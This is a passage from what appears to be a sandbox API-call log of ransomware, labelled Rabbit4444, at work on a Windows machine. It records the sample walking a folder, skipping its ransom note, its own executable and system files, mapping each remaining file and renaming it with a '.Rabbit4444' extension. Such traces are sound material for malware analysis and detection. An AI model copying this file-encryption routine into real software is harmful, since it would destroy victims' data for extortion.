(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc", dwFileAttributes=0x0) returned 1 [0071.667] lstrlenW (lpString="2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc") returned 64 [0071.667] lstrlenW (lpString="Rabbit4444") returned 10 [0071.667] lstrcmpiW (lpString1="8613d252bc", lpString2="Rabbit4444") returned -1 [0071.667] lstrlenW (lpString=".dll") returned 4 [0071.667] lstrcmpiW (lpString1="52bc", lpString2=".dll") returned 1 [0071.667] lstrlenW (lpString=".lnk") returned 4 [0071.667] lstrcmpiW (lpString1="52bc", lpString2=".lnk") returned 1 [0071.667] lstrlenW (lpString=".ini") returned 4 [0071.667] lstrcmpiW (lpString1="52bc", lpString2=".ini") returned 1 [0071.667] lstrlenW (lpString=".sys") returned 4 [0071.667] lstrcmpiW (lpString1="52bc", lpString2=".sys") returned 1 [0071.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.668] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.668] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16297830968) returned 1 [0071.668] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16834) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0071.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0071.668] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44d0, lpName=0x0) returned 0x27c [0071.669] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44d0) returned 0x80000 [0071.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110df8 [0071.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110df8 | out: hHeap=0xe0000) returned 1 [0071.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16298147025) returned 1 [0071.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0071.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0071.671] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.671] CloseHandle (hObject=0x27c) returned 1 [0071.671] CloseHandle (hObject=0x260) returned 1 [0071.671] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc.Rabbit4444") returned 187 [0071.671] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2f38c2d26ac46a7f6c3ca4f2d7b1677cea02c84e91aa96f8a27baf8613d252bc.rabbit4444"), dwFlags=0x1) returned 1 [0071.672] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd39f6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7ddd39f6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7e7833f1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x46b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", cAlternateFileName="30D2DA~1")) returned 1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="Rabbit4444.exe") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2=".") returned 1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="..") returned 1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="windows") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="bootmgr") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="pagefile.sys") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="boot") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="ids.txt") returned -1 [0071.672] lstrcmpiW (lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", lpString2="NTUSER.DAT") returned -1 [0071.672] lstrcpyW (in: lpString1=0x130ec18, lpString2="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14" | out: lpString1="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14") returned="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14" [0071.672] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14", dwFileAttributes=0x0) returned 1 [0071.673] lstrlenW (lpString="30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14") returned 64 [0071.673] lstrlenW (lpString="Rabbit4444") returned 10 [0071.673] lstrcmpiW (lpString1="fcdc096a14", lpString2="Rabbit4444") returned -1 [0071.673] lstrlenW (lpString=".dll") returned 4 [0071.673] lstrcmpiW (lpString1="6a14", lpString2=".dll") returned 1 [0071.673] lstrlenW (lpString=".lnk") returned 4 [0071.673] lstrcmpiW (lpString1="6a14", lpString2=".lnk") returned 1 [0071.673] lstrlenW (lpString=".ini") returned 4 [0071.674] lstrcmpiW (lpString1="6a14", lpString2=".ini") returned 1 [0071.674] lstrlenW (lpString=".sys") returned 4 [0071.674] lstrcmpiW (lpString1="6a14", lpString2=".sys") returned 1 [0071.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.674] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.674] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16298480706) returned 1 [0071.674] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1131) returned 1 [0071.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0071.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0071.674] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x27c [0071.675] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x80000 [0071.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1103a8 [0071.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1103a8 | out: hHeap=0xe0000) returned 1 [0071.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0071.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.678] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16298881146) returned 1 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0071.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0071.678] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0071.678] CloseHandle (hObject=0x27c) returned 1 [0071.678] CloseHandle (hObject=0x260) returned 1 [0071.678] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14.Rabbit4444") returned 187 [0071.678] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\30d2da25a9658be5fc67ba071ac8e0571f3095ab06bcbd4d5d14a1fcdc096a14.rabbit4444"), dwFlags=0x1) returned 1 [0071.679] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb225c038, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb225c038, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb27b8e78, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x1184e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", cAlternateFileName="321E92~1")) returned 1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="Rabbit4444.exe") returned -1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2=".") returned 1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="..") returned 1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="windows") returned -1 [0071.679] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="bootmgr") returned -1 [0071.680] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="pagefile.sys") returned -1 [0071.680] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="boot") returned -1 [0071.680] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="ids.txt") returned -1 [0071.680] lstrcmpiW (lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", lpString2="NTUSER.DAT") returned -1 [0071.680] lstrcpyW (in: lpString1=0x130ec18, lpString2="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f" | out: lpString1="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f") returned="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f" [0071.680] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f", dwFileAttributes=0x0) returned 1 [0071.680] lstrlenW (lpString="321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f") returned 64 [0071.680] lstrlenW (lpString="Rabbit4444") returned 10 [0071.680] lstrcmpiW (lpString1="7eb08cfe1f", lpString2="Rabbit4444") returned -1 [0071.680] lstrlenW (lpString=".dll") returned 4 [0071.680] lstrcmpiW (lpString1="fe1f", lpString2=".dll") returned 1 [0071.680] lstrlenW (lpString=".lnk") returned 4 [0071.680] lstrcmpiW (lpString1="fe1f", lpString2=".lnk") returned 1 [0071.680] lstrlenW (lpString=".ini") returned 4 [0071.680] lstrcmpiW (lpString1="fe1f", lpString2=".ini") returned 1 [0071.680] lstrlenW (lpString=".sys") returned 4 [0071.680] lstrcmpiW (lpString1="fe1f", lpString2=".sys") returned 1 [0071.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.681] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16299139323) returned 1 [0071.681] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1148131) returned 1 [0071.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0071.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0071.681] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1187f0, lpName=0x0) returned 0x27c [0071.682] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1187f0) returned 0x3110000 [0071.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1109d8 [0071.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0071.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1109d8 | out: hHeap=0xe0000) returned 1 [0071.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.713] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0071.713] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16302334098) returned 1 [0071.713] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0071.713] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0071.713] UnmapViewOfFile (lpBaseAddress=0x3110000) returned 1 [0071.723] CloseHandle (hObject=0x27c) returned 1 [0071.723] CloseHandle (hObject=0x260) returned 1 [0071.723] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f.Rabbit4444") returned 187 [0071.723] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\321e92d6b5e6fb51a51aa7af3afb13138f26b4ee847a691a28db747eb08cfe1f.rabbit4444"), dwFlags=0x1) returned 1 [0071.900] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c7b594, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb8c7b594, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8f03b6b, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", cAlternateFileName="3333CB~1")) returned 1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="Rabbit4444.exe") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2=".") returned 1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="..") returned 1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="windows") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="bootmgr") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="pagefile.sys") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="boot") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="ids.txt") returned -1 [0071.900] lstrcmpiW (lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", lpString2="NTUSER.DAT") returned -1 [0071.900] lstrcpyW (in: lpString1=0x130ec18, lpString2="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216" | out: lpString1="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216") returned="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216" [0071.900] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216", dwFileAttributes=0x0) returned 1 [0071.901] lstrlenW (lpString="3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216") returned 64 [0071.901] lstrlenW (lpString="Rabbit4444") returned 10 [0071.901] lstrcmpiW (lpString1="93320ea216", lpString2="Rabbit4444") returned -1 [0071.901] lstrlenW (lpString=".dll") returned 4 [0071.901] lstrcmpiW (lpString1="a216", lpString2=".dll") returned 1 [0071.901] lstrlenW (lpString=".lnk") returned 4 [0071.901] lstrcmpiW (lpString1="a216", lpString2=".lnk") returned 1 [0071.901] lstrlenW (lpString=".ini") returned 4 [0071.901] lstrcmpiW (lpString1="a216", lpString2=".ini") returned 1 [0071.901] lstrlenW (lpString=".sys") returned 4 [0071.901] lstrcmpiW (lpString1="a216", lpString2=".sys") returned 1 [0071.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\3333cb48db1fe6a1f418058365775172a08a00c54b58cf5380f19d93320ea216"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.902] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.902] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16321261410) returned 1 [0071.902] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1538) returned 1 [0071.902] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0071.902] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0071.902] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x910, lpName=0x0) returned 0x27c [0071.903] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x910) returned 0x80000 [0071.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0071.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0071.905] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0071.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0071.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0071.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0071.906] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16321644743) returned 1 [0071.906] 